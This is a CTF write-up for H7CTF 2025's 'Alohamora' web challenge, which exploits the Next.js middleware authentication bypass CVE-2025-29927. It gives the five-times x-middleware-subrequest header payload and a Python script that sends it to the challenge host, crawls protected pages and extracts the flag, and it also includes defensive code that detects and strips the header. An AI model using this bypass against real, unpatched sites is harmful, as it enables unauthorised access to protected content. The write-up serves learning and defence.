H7CTF 2025 - WriteUp: [WEB] Alohamora

CTF Cybersecurity Writeup

Challenge Description

The challenge presented some kind of Harry Potter landing page. Based on the description above, I already knew this challenge would involve a recent CVE.

When it comes to web challenges, I always take a sneak peek at the page source itself to see whether I can identify the tech stack or any hint hidden in the challenge.

Yep! They always give me something. As we can see, there are a few static file paths starting with /_next/static/..., so I can conclude that this challenge is built on the Next.js framework.

I kept exploring the challenge and arrived at the Faculty page. Nothing interesting there, except that Dumbledore's profile is quite different and has a button that redirects us to his office.

Unfortunately, his office page is protected and immediately redirects us to the login page. I assumed this was the part I needed to bypass. I did some googling on recent Next.js CVEs and found the page below, which explains the CVE.

https://github.com/lirantal/vulnerable-nextjs-14-CVE-2025-29927

Let's try to apply the PoC exploit to the challenge. First, I need to know the protected endpoint I have to bypass. That is easy to get from Inspect Element: it is /forbidden/dumbledore-office.

Intercepting the request in BurpSuite, I modified it by adding an x-middleware-subrequest header.

Payload:

x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
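The header above works because affected Next.js versions use x-middleware-subrequest internally to stop middleware from recursing: once the value lists the middleware name five times (the recursion limit), the middleware, and with it the login check, is skipped. Since a real internal subrequest never arrives from the outside, the defensive fix is to treat any external copy of that header as hostile: strip it at the edge and alert when it carries the repeated-name pattern. The following is an added example of that triage logic, not code from the write-up or from Next.js; the list of middleware file names and the sample requests are constructed for the example.

```python
from typing import Dict, List, Optional, Tuple

HEADER = "x-middleware-subrequest"
# Affected Next.js versions skip middleware when the header repeats the
# middleware name this many times; the write-up's payload repeats it five times.
MAX_RECURSION_DEPTH = 5
# Middleware file names that the internal check matches against
# (assumed list for this example, not taken from the Next.js source).
KNOWN_NAMES = ("middleware", "src/middleware", "pages/_middleware", "src/pages/_middleware")


def _get_header(headers: Dict[str, str], name: str) -> Optional[str]:
    """Case-insensitive header lookup, since proxies normalise header case."""
    for key, value in headers.items():
        if key.lower() == name:
            return value
    return None


def classify_request(headers: Dict[str, str]) -> str:
    """Verdict for one request's headers:
    'clean'          - header absent
    'strip'          - header present but below the skip threshold (still remove it)
    'bypass-attempt' - a known middleware name repeated >= MAX_RECURSION_DEPTH times
    """
    value = _get_header(headers, HEADER)
    if value is None:
        return "clean"
    parts = [p.strip() for p in value.split(":") if p.strip()]
    repeats = max((parts.count(name) for name in KNOWN_NAMES), default=0)
    if repeats >= MAX_RECURSION_DEPTH:
        return "bypass-attempt"
    return "strip"


def sanitize_headers(headers: Dict[str, str]) -> Dict[str, str]:
    """Drop the header before the request reaches the application,
    which is the mitigation for deployments that cannot patch immediately."""
    return {k: v for k, v in headers.items() if k.lower() != HEADER}


def triage(requests: List[Dict]) -> List[Tuple[str, str]]:
    """Run classify_request over a batch of {"path", "headers"} records."""
    return [(r["path"], classify_request(r["headers"])) for r in requests]


# Constructed sample requests, modelled on the write-up's protected path
SAMPLE_REQUESTS = [
    {"path": "/forbidden/dumbledore-office",
     "headers": {"x-middleware-subrequest": "middleware:middleware:middleware:middleware:middleware"}},
    {"path": "/forbidden/dumbledore-office",
     "headers": {"X-Middleware-Subrequest": "pages/_middleware"}},
    {"path": "/forbidden/restricted-section",
     "headers": {"x-middleware-subrequest": "middleware:middleware:middleware"}},
    {"path": "/faculty",
     "headers": {"user-agent": "Mozilla/5.0"}},
]

if __name__ == "__main__":
    for path, verdict in triage(SAMPLE_REQUESTS):
        print(f"{verdict:15} {path}")
    cleaned = sanitize_headers(SAMPLE_REQUESTS[0]["headers"])
    print("after sanitize:", cleaned)
```

Any non-clean verdict should result in the header being removed before forwarding; the bypass-attempt verdict is the one worth alerting on, because a three-times repetition is already an anomaly but only the five-times form actually disables the middleware in the affected versions.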

Now, let’s forward the request!

BINGO! It works, but the flag is not on this page, and the bypassed page contains a few more buttons and links. So I wrote an exploit script that bypasses the login and tries every protected link within Dumbledore's office page until it reaches the flag.

import requests as req
import re
from bs4 import BeautifulSoup

# Five repetitions of the middleware name, same as the manual Burp request above
payload = "middleware:middleware:middleware:middleware:middleware"
headers = {"x-middleware-subrequest": payload}
BASE_URL = "http://34.180.7.168:41832"
url = f"{BASE_URL}/forbidden/dumbledore-office"

# Fetch the protected office page with the bypass header
r = req.get(url, headers=headers, allow_redirects=True)

# Collect every link on the page that points into /forbidden/
soup = BeautifulSoup(r.content, 'html.parser')
links = soup.find_all('a', href=True)
pattern = re.compile(r'^/forbidden/.+')
matching_links = [link['href'] for link in links if pattern.match(link['href'])]

# Visit each protected link with the same header until a flag shows up
for link in matching_links:
    new_url = BASE_URL + link
    print(f"Finding flag in {new_url}")
    exploit = req.get(new_url, headers=headers, allow_redirects=True)
    match = re.search(r'H7CTF\{.*?\}', exploit.text)
    if match:
        print("Flag:", match.group())
        break

Flag: H7CTF{al0ha_m1ddl3ware_m1ddl3ware_m1ddl3ware_976b83a9-7377-4867-b195-dd1ad9f16d9e}